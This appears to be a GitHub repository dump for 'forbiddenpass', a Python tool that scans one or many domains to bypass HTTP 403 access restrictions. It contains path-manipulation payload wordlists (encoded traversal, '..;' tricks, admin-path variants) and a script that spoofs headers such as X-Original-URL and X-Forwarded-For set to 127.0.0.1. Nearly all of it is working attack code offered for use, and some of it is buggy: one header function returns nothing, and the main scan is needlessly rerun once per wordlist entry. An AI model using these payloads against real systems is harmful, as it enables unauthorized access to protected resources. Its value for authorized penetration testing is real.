[
  {
    "path": "README.md",
    "content": "# UPDATE \n\nThanks to Knowledge-Wisdom-Understanding (MrPMillz) for making the script cleaner and fixing the header payloads.\n\n# INSTALLATION\n\n```bash\n\ngit clone https://github.com/gotr00t0day/forbiddenpass.git\n\ncd forbiddenpass\n\npip3 install -r requirements.txt\n\npython3 forbiddenpass.py -h\n\n```\n\n# USAGE \n\n```bash\n\n___________         ___.   .__    .___  .___           __________                                        \n\\_   _____/_________\\_ |__ |__| __| _/__| _/____   ____\\______   \\_____    ______ ______                 \n |    __)/  _ \\_  __ \\ __ \\|  |/ __ |/ __ |/ __ \\ /    \\|     ___/\\__  \\  /  ___//  ___/                 \n |     \\(  <_> )  | \\/ \\_\\ \\  / /_/ / /_/ \\  ___/|   |  \\    |     / __ \\_\\___ \\ \\___ \\                  \n \\___  / \\____/|__|  |___  /__\\____ \\____ |\\___  >___|  /____|    (____  /____  >____  >                 \n     \\/                  \\/        \\/    \\/    \\/     \\/               \\/     \\/     \\/   v1.0           \n                                                                                                         \n                                                                                                         \n                                                                                                         \nusage: forbiddenpass.py [-h] [-p domain.com] [-d filename.txt] [-t site.com]                             \n                                                                                                         \noptional arguments:                                                                                      \n  -h, --help            show this help message and exit                                                  \n  -p domain.com, --path domain.com                                                                       \n                        path to check                                                                    \n  -d filename.txt, --domains filename.txt                                                                \n                        domains to check                                                                 \n  -t site.com, --target site.com                                                                         \n                        domain to check \n ```\n \n # EXAMPLE\n \n domains to check\n ```\n python3 forbiddenpass.py -d domains.txt\n ```\n domains to check with a path\n ```\n python3 forbiddenpass.py -d domains.txt --path login\n ```\n scan a single target\n ```\n python3 forbiddenpass.py -t https://site\n ```\n scan a single target with a path\n ```\n  python3 forbiddenpass.py -t https://site --path login\n ````\n\n# DISCLAIMER\n\ninspired by https://github.com/iamj0ker/bypass-403 </br>\nbypass-403 doesn't support scanning multiple domains and I needed to speed things up a bit so forbiddenpass was created\n"
  },
  {
    "path": "admin.txt",
    "content": "/accessible/..;/admin\n/.;/admin\n/admin;/\n/admin/~\n/./admin/./\n/admin?param\n/%2e/admin\n/admin#\n"
  },
  {
    "path": "bypasses.txt",
    "content": "/\n/%2e/\n//.\n////\n/.//./\n/.;/\n/%20\n/../\n%09\n%20\n%%%%20\n%%%%23%%%%3f\n%%%%252f%%%%252f\n%%%%252f/\n%%%%2e%%%%2e\n%%%%2e%%%%2e/\n%%%%2f\n%%%%2f%%%%20%%%%23\n"
  },
  {
    "path": "forbiddenpass.py",
    "content": "from colorama import Fore, Back, Style\nfrom fake_useragent import UserAgent\nimport concurrent.futures\nimport requests\nimport argparse\nimport sys\nimport json\n\nbanner = r\"\"\"\n\n\n___________         ___.   .__    .___  .___           __________\n\\_   _____/_________\\_ |__ |__| __| _/__| _/____   ____\\______   \\_____    ______ ______\n |    __)/  _ \\_  __ \\ __ \\|  |/ __ |/ __ |/ __ \\ /    \\|     ___/\\__  \\  /  ___//  ___/\n |     \\(  <_> )  | \\/ \\_\\ \\  / /_/ / /_/ \\  ___/|   |  \\    |     / __ \\_\\___ \\ \\___ \\\n \\___  / \\____/|__|  |___  /__\\____ \\____ |\\___  >___|  /____|    (____  /____  >____  >\n     \\/                  \\/        \\/    \\/    \\/     \\/               \\/     \\/     \\/   v1.1\nby c0d3Ninja, MrPMillz\n\n\"\"\"\n\nprint(Fore.CYAN + banner)\n\nparser = argparse.ArgumentParser()\ngroup = parser.add_mutually_exclusive_group()\n\ngroup.add_argument('-p', '--path', action='store',\n                   type=str, help='path to check',\n                   metavar='domain.com')\n\nparser.add_argument('-d', '--domains', action='store',\n                    help=\"domains to check\",\n                    metavar=\"filename.txt\")\n\nparser.add_argument('-t', '--target', action='store',\n                    help=\"domain to check\",\n                    metavar=\"site.com\")\n\nargs = parser.parse_args()\n\nua = UserAgent()\n\n\ndef word_list(wordlist: str) -> list:\n    try:\n        with open(wordlist, 'r') as f:\n            _wordlist = [x.strip() for x in f.readlines()]\n        return _wordlist\n    except FileNotFoundError as fnf_err:\n        print(f\"FileNotFoundError: {fnf_err}\")\n        sys.exit(1)\n\nwordlist = word_list(\"bypasses.txt\")\n\n\ndef header_bypass(path=None):\n    headers = [\n        {'User-Agent': str(ua.chrome)},\n        {'User-Agent': str(ua.chrome), 'X-Original-URL': path if path else '/'},\n        {'User-Agent': str(ua.chrome), 'X-Custom-IP-Authorization': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-For': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-For': '127.0.0.1:80'},\n        {'User-Agent': str(ua.chrome), 'X-Originally-Forwarded-For': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Originating-': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Originating-IP': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'True-Client-IP': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-WAP-Profile': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Arbitrary': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-HTTP-DestinationURL': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Proto': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'Destination': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Remote-IP': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Client-IP': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Host': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Host': 'http://127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-ProxyUser-Ip': '127.0.0.1'},\n        {'User-Agent': str(ua.chrome), 'X-rewrite-url': path if path else '/'}\n    ]\n    return headers\n\ndef port_based_bypass(path=None):\n    headers = [\n        {'User-Agent': str(ua.chrome)},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '4443'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '80'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '8080'},\n        {'User-Agent': str(ua.chrome), 'X-Forwarded-Port': '8443'}\n    ]\n\ndef do_request(url: str, stream=False, path=None):\n    if path:\n        headers = header_bypass(path=path)\n    else:\n        headers = header_bypass()\n    try:\n        for header in headers:\n            if stream:\n                r = requests.get(url, stream=True, headers=header)\n            else:\n                r = requests.get(url, headers=header)\n            if r.status_code == 200:\n                print(Fore.WHITE + url + ' ' + json.dumps(list(header.items())[-1]) + Fore.GREEN + \" [{}]\".format(r.status_code))\n            else:\n                print(Fore.WHITE + url + ' ' + json.dumps(list(header.items())[-1]) + Fore.RED + \" [{}]\".format(r.status_code))\n    except requests.exceptions.ConnectionError as ce_error:\n        pass\n    except requests.exceptions.Timeout as t_error:\n        print(\"Connection Timeout Error: \", t_error)\n        pass\n    except requests.exceptions.RequestException as req_err:\n        print(\"Some Ambiguous Exception:\", req_err)\n        pass\n\n\ndef main(wordlist):\n    if args.domains:\n        if args.path:\n            print(Fore.CYAN + \"Checking domains to bypass....\")\n            checklist = word_list(args.domains)\n            for lines in checklist:\n                for bypass in wordlist:\n                    links = lines + \"/\" + args.path + bypass\n                    do_request(links, stream=True, path=args.path)\n        else:\n            print(Fore.CYAN + \"Checking domains to bypass....\")\n            checklist = word_list(args.domains)\n            for lines in checklist:\n                for bypass in wordlist:\n                    links = lines + bypass\n                    do_request(links, stream=True)\n    if args.target:\n        if args.path:\n            print(Fore.GREEN + f\"Checking {args.target}...\")\n            for bypass in wordlist:\n                links = args.target + \"/\" + args.path + bypass\n                do_request(links, path=args.path)\n\n        else:\n            print(Fore.GREEN + f\"Checking {args.target}...\")\n            for bypass in wordlist:\n                links = args.target + bypass\n                do_request(links)\n\nif __name__ == \"__main__\":\n    try:\n        with concurrent.futures.ThreadPoolExecutor() as executor:\n            executor.map(main, wordlist)\n    except KeyboardInterrupt as err:\n        sys.exit(0)\n"
  },
  {
    "path": "requirements.txt",
    "content": "colorama\nrequests\nfake-useragent\nargparse\n"
  }
]